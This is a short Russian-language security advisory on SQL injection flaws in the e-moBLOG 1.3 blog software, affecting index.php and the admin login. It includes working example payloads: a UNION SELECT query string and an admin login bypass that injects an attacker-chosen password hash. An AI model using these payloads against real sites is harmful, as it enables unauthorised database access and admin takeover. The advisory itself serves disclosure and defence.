• Партнер

  • Программа: e-moBLOG 1.3, возможно более ранние версии

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "monthy"
    сценария index.php и параметре "login" сценария admin/index.php. Удаленный
    пользователь может с помощью специально сформированного запроса выполнить
    произвольные SQL команды в базе данных приложения. Удачная эксплуатация
    уязвимости возможна при выключенной опции "magic_quotes_gpc".

    Пример:

    http://host/emoblog/index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5,
    6,7,8,9,10/*#1

    http://host/emoblog/admin/index.php
    username: aaa' union select 'bbb', '[md5-hash of anypass]'/*
    password: [anypass]
     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии